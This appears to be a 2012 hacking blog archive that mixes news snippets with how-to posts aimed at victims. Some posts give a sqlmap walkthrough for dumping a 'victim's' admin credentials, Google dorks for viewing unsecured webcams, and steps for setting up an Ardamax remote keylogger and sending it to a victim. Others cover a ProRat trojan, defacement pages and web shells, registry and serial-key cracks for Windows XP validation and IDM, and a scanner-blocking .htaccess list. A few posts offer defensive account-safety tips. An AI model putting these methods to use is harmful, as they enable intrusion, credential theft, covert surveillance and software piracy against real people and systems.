Tuesday, 25 December 2012

How to Hack a Cisco Phone





Columbia computer scientist Ang Cui helped uncover a weakness in Cisco IP phones that can let a hacker take complete control of them.

Read more at http://spectrum.ieee.org/computing/embedded-systems/cisco-ip-phones-vulnerable

How to hack games from the Windows 8 store




Hi folks,



In this article I’ll share the results of ad-hoc security vulnerabilities research I’ve done on windows 8 apps deployment. Specifically, we’ll discuss fundamental design flaws that allow to Reverse Engineer Win8 apps, modification of installed apps and the negative implications on Intellectual Property rights protection, Licensing models and overall PC security. Finally we’ll

Sunday, 23 December 2012

Remove Windows XP Genuine Validation

windows xp genune validation

My many friend have asked me how can we remove windows xp genuine validation. So I think many other may have the same problem and for that I have written this article about How to remove windows xp genuine validation. Well to remove windows xp genuine validation you just have to change the registry key of the windows. well you dnt have to worry about how will you change it I have made it very easy.. Smile

 

Follow the simple steps to remove windows xp genuine validation

1. Open notepad and paste the bellow code in it.

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents] "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd "LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] "CurrentBuild"="1.511.1 () (Obsolete data - do not use)" "InstallDate"=dword:427cdd95 "ProductId"="69831-640-1780577-45389" "DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34,30,2d,\ 31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,\ 30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,ee,62,4f,e6,64,6f,01,00,\ 00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,\ 00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac "LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b,0b,82,\ c3,74,ab,42,0d,fb,ee,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,\ 0a,0a,ce,0d,b8,27,4a,46,53,f3,17

2. Now save it as anything.reg like windows.reg and double click on it  and click Yes if prompted.
3. Now you have done !

your windows xp is genuine now !!

Tuesday, 18 December 2012

Block your website from scanners

block website from scanner

Hackers uses the scanners to scan the website and to find the security vulnerability. And today I am going to share one trick to block all the scanners to scan your website. Here I am sharing one script Just add that script in to the .htaccess of your website and it will block all the security scanners like Acunetix, nessus, Openvas etc.

 

 

 

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>

Just add above code in to the .htaccess of your website and all the security scanners will be blocked Smile

Monday, 17 December 2012

Collection of Top 10 Deface page

Top deface page

What is deface page ?

After getting admin access in the website hacker will upload his own control penal that’s called the shell and with the help of the shell hacker will Edit the index page of the website and he will change the index page coding so that website can be called the defaced website. And the index page is called the deface page. And the deface page is coded in the simple html language.

 

 

Top 10 deface pages

You don’t have enough time to code the deface page ? well here I am sharing the top 10 deface pages ever.

1- Happy Birthday Deface Page

When you want to wish Happy birthday to some special people then you can use this deface page.
Live Demo : Download


2- Deface Page For Long Messages + Video

When you have to send the long message then you can use this deface page, this is a pro. deface page Designed By Ffessxt Prince Indishell.
Live Demo : Download


3- #opFreedom Palestine,
Deface page with free Palestine message, Designed by The Hackers army
Live Demo : Download


4- Lovely deface Page for Your Girlfriend or loved one

This deface page is designed by the MInhal for his Girlfriend  you can use it for your loved one :D
Live Demo : Download

 

5-Multi color deface page
This is just awesome deface page I liked this deface page personally.
Live Demo : Download

 

6- Simple Black Deface Page
Designed by Hax root
Live Demo : Download

7-Matrix Style Deface Page

Designed by ShOrTy420
Live Demo : Download

8- Awesome  #opFreedom Palestine Page with New Functions

this page designed by Syakila Daniel
Live Demo : Download

9- Awesome Matrix style Deface Page

Designed by coded32 
Live Demo : Download

10- Romantic deface Page with Roses

designed by Deepak  Carpenter
Live Demo : Download


All the deface pages are shared in the pastebin and you can easily edit it and save it index.html and anything you like .html.

credit:devilscafe.in

Sunday, 9 December 2012

Improve Backtrack5

Top tips to improve Backtrack5Backtrack is specially designed for the security researcher and hackers. Its most awesome operating system with lots of the tools but in this operating system we have to add some of the basic application to improve the performance of the operating system. We have to install some of the basic application to use backtrack5 daily. There are 12 basic applications to install in the backtrack5. Now just open your backtrack terminal because in this operating system we have to enter the commands to install the applications.

1. Software Center

Software Center helps you to manage the applications and to search the applications to install Software Center enter the following command in your backtrack terminal.

apt-get install software-center

This command will install Ubuntu software center using that you can search your installed application and you can also install application with just a single click.

 

2. Messenger

To install Messenger in the backtrack enter the bellow command in the terminal and hit enter

apt-get install empathy && apt-get install pidgin

Using this messenger you can be connected with yahoo, Facebook etc.

 

3. Screen Recorder

xvidcap is best screen recorder for the backtrack I have used it for 5-6 time and I personally liked it.
To install screen recorder just enter the following command in the terminal.

apt-get install xvidcap

 

4.Team Viewer

You have to download it from their official website and you have to add the following command to install the team viewer.

root@bt:~# cd Downloads
root@bt:~/Downloads# dpkg -i teamviewer_linux*.deb

5. For archive extraction

Install ark archive in the backtrack5 by adding the following command in the terminal

apt-get install ark

 

6. FTP client

To install FTP client into the backtrack add the following command in the terminal

apt-get install filezilla

 

7. PDF Reader

Install PDF reader into the backtrack 5 add the following command in the terminal

apt-get install xpdf

And now you have done ! now you can easily use Backtrack daily base :)

Top 3 Penetration test E-book

meta sploit ebooks

After publishing many tutorials on hacking today I am going to share my three fav. Penetration test E-book named Metasploit Penetration, Nmap cook-Book, Net cut Power tools. you can download these books from the bellow links.

 Metasploit Penetration | Nmap cook-Book | Net cut Power tools

Saturday, 8 December 2012

Crack any version of Internet Download Manager (idm) manually

creack internet download manager

Internet Download Manager is the best download manager all we know using Internet Download Manager we can download youtube videos and many other web videos easily and the best thing about the Internet Download Manager is you can resume the pushed download link many time. But Internet Download Manager is premium software means its not free you can use it for a 30 days trial version and you have to buy the license. But I am using it without buying the license. So follow the simple steps to crack your Internet Download Manager manually.

Follow the simple steps to crack Internet Download Manager

1. Download the hosts file from here.

2.go to  C:\Windows\System32\drivers\etc and replace that old hosts file with new one.

3. Now open IDM and go to registration > registration.

4. Now enter your name,email etc and add this key HUDWE-UO689-6D27B-YM28M and hit okay
and you have done ! after this your IDM will never ask for the serial key :)
If you have any query then feel free to ask ! make a comment.

Friday, 16 November 2012

How To Hack Any Skype Account Via Skype Password Reset Vulnerability | iJailbreak.com


It can sometimes be difficult to balance out ease of use with security. Software companies and online services can be under pressure to make the user experience as smooth as possible, even for potentially risky services like password resets, which saves the company money on tech support and help costs. Unfortunately, rounding off corners can also create gaps in security. A security hole was

How to Hack into a Webcam










 









A former information technology director of a Tampa advertising firm is facing jail time after some unauthorized "facetime" with a couple of female co-workers.

Thursday, Christopher Channer pleaded guilty to federal charges of intercepting communications after the FBI determined that back in 2010, he tapped into webcams of female employees of the Atlanta office of 22squared

How to Hack Google Search Results




Dan Petrovic has explained how he hijacked a few pages in Google to show his copied version over the original version of the page.

For example, he was able to confuse Google into thinking a page on MarketBizz should really show on dejanseo.com.au instead of on marketbizz.nl.

How did he do it? He simply copied the full page, source code and everything and put it on a new URL on his site. He

Wednesday, 7 November 2012

How To Hack And Protect Your Own WPA Network




You probably own a personal Wi-Fi hotspot at home. Having several devices under one roof seems like a good reason to convert your broadband internet into a wireless connection. Some internet providers in your area might even have paid Wi-Fi hotspots for homes and establishments.

Since anyone can connect to your Wi-Fi network, the next best idea is to protect it with a WPA password. A WPA

Saturday, 3 November 2012

Top 5 Ways to Boost Traffic to Your Site




Ever since the advent of the Search Engine Optimization by Google, there has been a clamor among websites to increase traffic. Higher traffic allows for more popularity of the website, and also brings in higher number of revenue through advertisements to the website. There are some simple ways to boost one’s web traffic as listed and explained below:

SEO Keywords

One should check Google’s research tool to research and come up with keywords that are commonly searched for, and appropriate to the content posted on one’s website. Keyword popularity is as important as is keyword usability. After a keyword or keywords have been chosen, it is advisable to have keywords planted in the content of the website as well as in the titles of the articles. This is due to the fact that the web can’t read anything other than HTML. Thus if the HTML has the SEO Keywords peppered in it, it would be higher on the rating charts.

Original and Honest articles

It is paramount for web articles to be original, as any web search engine has a module to check for plagiarism in the website’s articles. In case any are found to be plagiarized, the website loses page rank as it is blacklisted by the engine. Honest work is equally important, as quality often contributes to the popularity of a webpage. For instance, if a website provides honest reviews with links for software or technology, it is known to bring in a higher page rank and more viewers. Submitting articles to article directories can also provide backlinks which increase traffic. Their requirements include unique content.

Social Sharing

With the world presenting an overwhelming presence in the social networking universe, one cannot ignore this potential source of traffic. Inclusion of sharing buttons to different social networking sites like Google+, Facebook, Twitter etc. can kick off social bookmarking which is now the easiest way to SEO. This allows a user to get backlinks from the social networking websites.

Forum Commenting

One of the most classic methods is to find target audience. If one’s website caters to people who cook, then it would be beneficial to get traffic with expertise or interest in such matters. Thus, checking out and joining online forums dedicated on such topics would be commendable. One should leave intelligent and targeted comments on these forums with backlinks to one’s websites. This is akin to rubbing someone’s back to get a back rub of one’s own.

Linking and Updating

If one has a website with multiple links then one should ensure that he links the new articles with older articles to get redirected traffic on different pages in the website from in the site itself. Thus, this calls for the website to have interrelated material to an extent. One should also try and write timeless articles, ones which are not rendered redundant by the world within a few months or years. Thus the choosing of topics that are always needed ensure that even the oldest of posts generates a lot of traffic.

This is a guest post contribution by Osho Garg, who writes for http://www.opendoorloan.co.uk, a site that offers link to the best loan options for their readers.

Top 5 Games for Android Smartphones

One of the most happening advancements in the field of cell phone technology is the Android Application. This particular application is actually an operating system that is meant specifically for touch screen mobile handsets and tablets. This application has been designed by Google with a significant assistance from Open Handset Alliance.  This particular application offers a huge benefit to its users, particularly to the game freaks who love to play latest games or try recent versions of various gaming applications. These games are provided with superior graphics quality, high definition (HD) pictures and high quality sound that add to the entertainment of the individuals playing the games and make such gaming applications all the more attractive and interesting.

Some such highly advanced HD games are as follows:-
Temple Run
 Temple Run is an adventure game that encircles a young lad named Guy Dangerous who has stolen a priceless idol belonging to the ancient times from a sacred temple. His immediate purpose is to flee from the city so that he can save his life from the deadly attacks of the demonic monkeys who now, are in search of him. This happens to be the very objective of the games as well that has greatly fascinated the people all across the globe. When the player is trying to get him out of the city, he is faced with numerous obstructions which have to be successfully overcome by the player to save the life of the central character of the game. If the player fails to go through these hindrances, the lad gets trapped and killed.
One astonishing feature of the game that differs it from other games of the same genre is that it has no finish line. Hence, the player needs to drag the lad as far as he can. On the way, the player will come across several coins which have to be collected in order to get power- ups and to advance up to the subsequent levels.  


Ninjump
Ninjump is a very entertaining game where the player, via ninja, has to jump higher and higher up to the maximum possible level in order to gather high scores. The basic difference between Ninjump and other animation games is that this particular game does not have any specific aim or objective that will mark the end of this game. The player only has to continue jumping as long as he can in order to score maximum points. In the jumping process, if the ninja is able to kill his enemies or eliminate hindrances by hitting them away, he gets special powers for some time. The degree of power can be increased by making such killings and hitting more and more.

Abduction
As the name suggests, Abduction is a game that involves a sudden kidnap of a few earthly creatures by treacherous aliens. A cow, who is a close friend of the ones kidnapped, plans to rescue them safely and this is the basic objective of the game. Here, the player has to successfully rescue all the hostages. In the process, the player has to cautiously land the cow on a appropriate platforms from which the cow can take a high jump. This jumping procedure has to be continued to cover greater distances each time till it reaches its friends. On the way, the cow has to encounter various obstructions which must be carefully overcome. The cow receives certain power ups and bonus points during his rescue act and can also gain extra lives.  

Mega Jump
From the very name of the game, it is clear that it is all about jumping constantly and perfectly to reach optimum heights in order to score maximum points. The game does not have any mission or purpose. The player only has to make a small, colorful monster jump as much as possible to reach high scores.

Speed Moto
 Speed Moto is a game that tests the speed, reflexes as well as the dodging skills of the player. Here, the player has to control a motorcycle and has to accelerate the same to run ahead of the rest of the traffic. On his way, he has to go through various obstacles that come in the form of various vehicles running on the road. This game is specifically meant for the bike lovers who are obsessed with speed and adventure. 
This post is written by Osho Garg who shares technology tips and tricks for cash advance site. Click over here for quick loans.

Wednesday, 17 October 2012

Pacemaker hack can deliver deadly 830-volt jolt




Pacemakers from several manufacturers can be commanded to deliver a deadly, 830-volt shock from someone on a laptop up to 50 feet away, the result of poor software programming by medical device companies.

The new research comes from Barnaby Jack of security vendor IOActive, known for his analysis of other medical equipment such as insulin-delivery devices.






Security researcher Barnaby

Friday, 12 October 2012

How to configure/use ProRat Trojan to hack someone's PC (Free download and instructions)







I have already written a post on hacking into someone's PC which was using Beast Trojan, you can check that by clicking here, and this time, i will show you how to configure ProRat Trojan to hack into your victim's computer. ProRat is also a Trojan making program which is similar to Beast Trojan but in compare to Beast, ProRat is much better.
It can connect to the server more faster.
It has

Thursday, 11 October 2012

How to Hack WhatsApp Messenger




Desktop IMs have long been our favorite mode of communication. But with time, their significance has definitely come down.

Smartphones taking large part of our daily life, IM services like Whatsapp, iMessage, BBM,  etc have emerged to be exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, but yet, its the most insecure way of communication.



As per

This hack can remotely wipe your Samsung Galaxy S III




It's bad enough when you clumsily manage to wipe a few odd bits of data off your phone by accident. But what if your entire phone was wiped, AND your SIM-card killed, remotely by hackers without you being able to do a single thing to stop them?

That's the issue being faced currently by owners of the Samsung Galaxy S III, Galaxy S II, Galaxy Beam, S Advance and Galaxy Ace. Nearly all of

Hack A Kindle To Work With A Raspberry Pi






Your ereader isn’t the most exciting device you could use as a monitor, but it’s a minimal solution that could come in handy when you’re on the road. Damaru over at Ponnuki shows us how to turn a Kindle into a display using a Raspberry Pi.


Using the Kindle as a screen, Damaru use a Raspberry Pi, a couple of USB cables and a keyboard to create a very minimal little computer. You do have to 

Tuesday, 9 October 2012

What is SHELL and How to use it ?

what is shell

After getting the admin access in the website attacker will upload his own control penal that’s called shell. It helps attacker to maintain access for the long time. There are many types of shells like DDOSE shell, symlink shell etc.

Using shell attacker can destroy whole database and he can leak the database of the website and using the shell he can root the server. (Only Linux server can be rooted windows server cant be rooted because there is no ROOT :P) After rooting he can destroy whole server. Suppose One server contains 500 websites and attacker got the admin access in the single site and he have rooted that server then 500 sites can be destroyed !

USES  OF  SHELL


1. Using shell you can Destroy the INDEX page of the website
2. You can host your files in the server :D
3. You can root the server

Now if you want to destroy the index page of the website then find the “INDEX” page from the list and replace that coding with your own deface page. And using browse option you can host your own file in the server. You can create your own shell and you can add your own tools in your shell. for that you know PHP.

Sunday, 7 October 2012

How to gain access to unprotected webcams using Google

hack live cam using google Today I am going to show you how to access  unsecured live webcam using  Google dorks. There are many Google dorks using that you can easily access live webcam. I will share some of the Google dorks with you Smile

Follow the simple steps :D

1. Open Google

2. Search inurl:/view.index.shtml

3. Now open any result

you can see the list of the live webcam


Here I am posting more google dorks Smile

inurl:/view.shtml

intitle:”Live View / - AXIS” | inurl:view/view.shtml^

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

Wednesday, 3 October 2012

Protect your Facebook Account

secure facebook accountNow a days Noob hackers are targeting Facebook account to get the person's information and to destroy their Facebook accounts. Every day thousands of Facebook account, other social networking and email accounts are getting hacked by the noob hackers. So today I am going to show you how to secure your Facebook account Smile

 

1.  Enable Secure Browsing

To enable secure browsing go to Account setting > security > and on the right side enable the secure browsing and click on save changes.

2. Be aware of phishing schemes
Most of the time attacker will send you email like “your account is at risk and you have to conform that this is real you or not and to conform your real identity you have to login in to your Facebook account using the bellow link.” this is the phishing scheme. That page will redirect you at the fake Facebook page and your email and passwords will be saved in the server, so don't trust this kind of emails and Use antivirus software's.

3. Choose strong and unique password
You have to choose strong and unique password for your Facebook/email accounts use special characters and use upper and lower case latters to create strongest password. don’t use this kind of passwords “i loveyou*******, 12345, mobileno, etc.

4. Never run any code in address bar
Whenever anyone tells you to run the code in to your browsers address bar then don't run that kind of codes because it’s a cookie stealing scheme.(google it cookie stealing)

5. Never use useless Facebook application
Some of the Facebook applications are tracking all your activity and some of the facebook application requires Facebook password verification and the password and your cookie will be saved in the server. so avoid using useless Facebook applications.

6.Connect your mobile with your Facebook account
Connect your mobile with Facebook account so when you lost your Facebook account password or your Facebook account got hacked then you can easily recover your Facebook account using your mobile.

7.Enable login notifications
Whenever you are trying to access your Facebook account from other computer at that time it will ask the device name and it will send you email that using  that device you have logged in into your Facebook account. To enable login notifications go to account setting > security and enable login notification.

8. Use updated antivirus
You must use updated antivirus to protect your self from the keyloggers and spyware software.
so follow this 8 tips to secure your Facebook account But still you cant say that your Facebook/email account cant be hacked because there are many ways to hack Facebook/ email accounts.

Tuesday, 25 September 2012

Bangladesh Cyber Army Announced Cyber War Between Pakistan And Bangladesh

bangladesh cyber army cyber war

A hackers group of Bangladesh named Bangladesh cyber army have announced the cyber war between the Bangladesh and Pakistan. According to their deface page the reason behind this cyber war is Pakistani hackers are destroying Bangladeshi websites and they want the punishment of all the war criminals and all unauthorized connection with the Bangladesh cyber space should be stopped. They have hacked number of Pakistani website and the list of the hacked website can be found here.

Monday, 10 September 2012

Hack lets Google Nexus 7 capture 720p video







Your Google Nexus 7 tablet may not have a rear-facing camera, but with a little technical know-how it appears you can get the slate's 1.2 megapixel front-facing camera to capture high-definition video. A user named "hillbeast" in the XDA Developers forum recently posted a quick how-to guide to get your Nexus 7 recording 720p video at 30 frames per second. Hillbeast also posted two videos to

How To Hack WPA2 Wireless Access Points








Many of you have probably seen plenty of tutorials on how to crack WEP encryption. We even did a video back in the old Bauer-Power podcast on how to hack a WEP protected wireless access point using Bauer-Puntu Linux and GrimWEPA. The fact of the matter is, cracking WEP is really easy! What about something more people are using today like WPA2?



It used to be that the only way to crack

Former Hacker Reveals How Business Owners Should Protect Their Web Sites







Mitnick was wanted for computer hacking — he bypassed security systems in organizations such as Motorola, Sun Microsystems, Pacific Bell and the FBI themselves — and he served five years in prison.

Today, he owns a security consulting firm called Mitnick Security. As a computer security consultant, Mitnick works with companies to prevent them from intruders like his former self. Below is a

Sunday, 2 September 2012

Why Everyone Is Getting Hacked These Days







If it feels like there have been a lot of password hacks this year, it's because there have been more than usual, and Ars Technica's Dan Goodin explains why that is. In short: Password hacking has gotten better, while our password making has gotten worse. "The result: security provided by the average password in 2012 has never been weaker," Goodin writes, which is why it shouldn't surprise

How to Hack into a School Computer









This is how to hack your school's computer. Don't do anything illegal or malicious. If you get in trouble, I am not responsible for your actions.





Please be careful with this - you could stop the computer from accessing the school network, or you could corrupt the operating system. This only works with Macs so don't bother trying it on a PC. Start up the computer and hold command S

How to Hack/Install Custom Firmware on Sony PSP-E1004 Street




On seeing that a 12 year old kid was still alive in me, one of my closest friends decided to gift me a Sony PSP this birthday. As soon as I opened the box and played games for few minutes, I was more curious about things I can do on it than just playing games all day (that was the tech blogger in me speaking). But when I searched the internet everything demanded a custom firmware running on

Sunday, 12 August 2012

How to Hack Facebook Password in 5 Ways




Check out the following post from fonelovetz blog on facebook account hacking.

This is one of the most popular questions which I'm asked via my email.And today I'm going to solve this problem one it for all.Even though i have already written a few ways of hacking a facebook password.Looks like i got to tidy up the the stuff here.The first thing i want to tell is.You can not hack or crack a

5 Ways To Avoid Being Hacked






Hacking. We often think of it happening to companies or governments. But it also happens to ordinary people. But we can take steps to stop it.





Step 1: Tough passwords

You need to have a separate password for each account, so that if one account gets hacked, all of your vital information is not vulnerable. The problem is that it's tough to remember dozens of passwords. The answer: a

How to avoid being hacked like Honan







Hackers used an iCloud account to perform a remote wipe on Mat Honan's iPhone, iPad and MacBook, deleting all his data. Photograph: M4OS Photos/Alamy



I read about Mat Honan, the journalist who had his email hacked and his devices wiped. What should we all be doing to avoid this kind of thing?

For those who missed the story, Wired journalist Mat Honan had hisGmail and Twitter accounts

Tuesday, 24 July 2012

Hack website using Backtrack (sqlmap)

In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables


6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

 

sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5

 

8. Now lets grab the columns from the admin table

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

Sunday, 22 July 2012

What is backtrack ?

whats backtrack

Backtrack is Ubuntu based operating system. Backtrack is the best operating system for the security professionals and hackers. There are lots of inbuilt tools in the backtrack 5 like sqlmap , metasploit , Information gathering, maintaining access , backdooring  etc.

How can I download Backtrack  ?


well you can download the Backtrack 5 at here.

Select the version of the OS I recommend Backtrack 5 R2 (because its latest version).

 

How to install the backtrack  ?


You can install it using making a flash drive or burning the DVD. I recommend make a flash drive and install it. (create flash drive of backtrack
What to do after installing ?

The default id and password of this operating system is
root and toor so after installing backtrack restart your computer and add this id and password.
Now if you want to use the GUI then simply type “Startx” to enter in the GUI of backtrack 5.

Thursday, 19 July 2012

Create bootable USB flash drive of any Linux os

install linux using flash drive

In my previous tutorial I have explained How to create the bootable USB flash drive for any windows operating system. Now, in this tutorial I am going to show you how to create the bootable USB flash drive for any Linux OS including backtrack 5. Now a days you don't need to write any DVD because you can create bootable USB flash drive. 
To create bootable flash drive for the Linux you need unetbootin (you can download it from here). Now just open unetbootin and select your OS and Its version.

install linux using flash drive

And browse your Linux operating system and then simply press OK and the process will going on in 15 min your USB flash drive will be created then simply reboot your computer and Boot your computer using the USB flash drive !

Sunday, 15 July 2012

Hack Facebook passwords-Facebook hacker software [for n00b]

facebook_account-hacker1
you want to hack your friend’s Facebook or Gmail account  right ? if yes then you are at the right place. You might have read somewhere that “use this software/tool to hack Facebook/Gmail account”  Many people have published their posts about Facebook hacking software in blogger and they have also uploaded the videos on YouTube that use this tool to hack the Facebook account.
The steps of that type of tutorials would be.
Download the tool
Run that tool
Enter your email id and password
And enter target Facebook email and no of passwords to try
And your target account is hacked !
Do you think this technique works ? Do you think Facebook is F**king stupid ? The truth behind that kind of the tool is that you are being hacked by hackers. They are simply providing you the spyware tools/keylogger. And your account will be hacked.

The truth behind Facebook account hacker tool

There is nothing called Facebook account hacker tool, and you cant hack any account without the mistakes of the victim. If you have downloaded that kind of tool them simply scan your computer with the antiviruses or format your computer. The aim of this kind of tools is to hack the n00b hackers don't  think like n00b , think like security expert.
Then how can you hack the Facebook account ?
There is Three ways to hack Facebook passwords
1. Using Phishing
2. Using Keylogger 
3. Using backtrack

What is keylogger ? How to configure the remote keylogger?

whats keylogger and how its works

Keylogger is a device which runs in the background of the victim’s computer and sends every keystroke to the hacker via ftp/email. Keylogger is a spyware. There are two types of keylogger hardware keylogger and software keylogger. Hardware keylogger are mostly used by the cyber café to get the ID and passwords. And the software keylogger used for remote computers.
In this tutorial I am going to tech you how to configure the Ardamax Keylogger. This is the full version of the keylogger which I have shared with you. Now simply install the ardamax keylogger. (your antivirus may consider it as a virus because it’s a keylogger so disable your antivirus for some time). Now just follow the simple steps to configure the remote keylogger.
how to use keylogger 7

Right click on the keylogger icon and simply select remote installation and then open window will pop up you have to do simply next and next. It will ask you for the delivery method if you have ftp then select ftp else select email then simply press next and in next step simply write your email address and password then simply press test if you got the delivery email then you have configured the keylogger correctly.
Then simply press next next and at last it will ask for the destination of the keylogger.(means where you want to save the keylogger ) and then press finish and you have done ! Now simply send that keylogger to the victim and when it will open your keylogger then their system will be infected with your keylogger. This tutorial is educational purpose only. you can read our disclaimer here.

Friday, 13 July 2012

50+ Pakistani sites got hacked by Ashell

hacked by ashell

Once again Pakistani cyberspace hit by the Indian hacker, this time Ashell from the INDISHELL have hacked and defaced 50+ Pakistani sites. According to the deface page we have found the reason of this attack, the reason  is the terrorists attack done by Pakistan on 13th July in respond to that attack Ashell have defaced 40+ websites. The list of the hacked website is here.

Tuesday, 10 July 2012

How to create a bootable USB flash drive of any windows operating system including windows 8

install windows operating system using pendriveIn this tutorial I am going to show you how to create the bootable USB flash drive of any windows operating system like windows xp , windows 7 and windows 8. Now a days you don't need to burn DVD and wasting your time + money. Now you can easily install the windows operating system through your Pendrive.

Things you need
1. The thing you need is 4 GB flash drive  (4gb pendrive)
2. WINDOWS 7 USB/DVD DOWNLOAD TOOL
3. Windows OS in IOS format (You can get the windows8 here)
install windows operating system using pendrive2Plugin the 4gb pendrive and just install the WINDOWS 7 USB/DVD DOWNLOAD TOOL and after installing that tool just run that tool and just browse your windows IOS file and press next the process will going on it will take 10-15 min to create the bootable flash drive. Now just reboot your computer and press F12 (to enter in the boot menu) in that boot menu select your pendrive and you have done!

Sunday, 20 May 2012

How to Hack a Password on Windows 7 with Software





Ophcrack is an open source and free program that bypass Windows passwords by using LM hashes through rainbow tables. The Ophcrack Windows password reset is by far the fastest freeWindows 7 password hacker tool available.



The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. On most computers, ophcrack can

Sunday, 13 May 2012

GPS vulnerable to dangerous hacks and spamming




The South Korean government has reported that electronic jamming signals from North Korea were affecting communications and GPS signals for passenger aircraft. So far, there has not been a serious threat to safety because the pilots were able to use supplemental navigation devices.

But how does a group disrupt signals from GPS or other communication systems in the first place?

The simplest

Friday, 11 May 2012

Create your own keyboard shortcut key to open a program

In this tutorial I am going to show you how to make your own shortcut key to open the program in faster way. Using this technique your speed will increase and you can make your own keyboard shortcut Just follow the simple steps.
1. go to start and right click on the program which you want to create a shortcut key
2. go to properties (see the bellow snapshot)
create your own shortcut

3. Now Click on shortcut key and just press ctrl and press any key ( from a to z ).
create your own shortcut 2

And hit ok and you have done !

Sunday, 29 April 2012

How to Hack a Website in Four Easy Steps





Every wondered how Anonymous and other hacktivists manage to steal the data or crash the servers of websites belonging to some of the world biggest organisations? Thanks to freely available online tools, hacking is no long the preserve of geeks, so we've decided to show you how easy it is to do, in just four easy steps.





Step 1: Identify your target



While Anonymous and other online

Sunday, 22 April 2012

How to Hack Websites - Cross Site Scripting (XSS)








Some of the interesting tutorials from the web on Cross Site Scripting attacks. 

(http://en.wikipedia.org/wiki/Cross-site_scripting)



A simple online explaination of XSS attacks designed to allow people to see in a hands on manner.

(http://www.steve.org.uk/Security/XSS/Tutorial/)



Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing ~ BreakTheSec:

(http://

Saturday, 14 April 2012

Multitouch hack for Nook Simple Touch






If it runs Android, it’s going to be pushed to its limits. That’s the general rule of thumb when it comes to the voracious modding and hacking community that has sprung up around Google’s mobile OS. Even a basic e-reader like the Nook Simple Touch hasn’t been safe from rooting and the loading of various Android services never meant to be experienced on the device’s monochrome eInk display.

Friday, 30 March 2012

iPhone Password Hacking is Easy




That four-digit passcode you have installed on your iPhone might slow snoops down, but it won't stop them.Forbes is reporting that in some cases, it takes less than two minutes to crack the code.

Micro Systemation is a Swedish company that sells software capable of skirting privacy controls on iOS and Android gadgets. Law enforcement and military agencies use this software in order to access

Lulzsec Hacks Military Dating Site







LulzSec, the Anonymous offshoot that hacks for fun ("for the lulz"), disbanded last June after 50 days of high profile hacks, also known as the 50 Day Cruise.

But the jokers appear to be making a comeback, perhaps in order to restore the confidence of its followers after it was revealed that former ringleader Sabu helped the FBI locate and arrest former teammates. 

On Tuesday, hackers

Thursday, 29 March 2012

Apple Azerbaijan Got Hacked By Team Nuts

apple hacked

Domain Apple.az represents 'Apple Azerbaijan' and it also redirects to the official reseller of apple in Arizona (www.almastore.az) , and it got hacked by 'YasH' and 'COde InjectOr' from team nuts.
Hackers have uploaded deface page You can see the deface page here

Friday, 23 March 2012

How to Hack Someone's Computer















As the digital world becomes more and more complex, the need for deliberate, thorough security grows. Yes, we know, you’ve got everything “password protected.” And yes, not every hacker is like the guys in the movies who are able to keyboard their way through complicated layers of encrypted, password-protected security faster than a gamer boots up a new version of Call of Duty.


Chinese Hack Microsoft






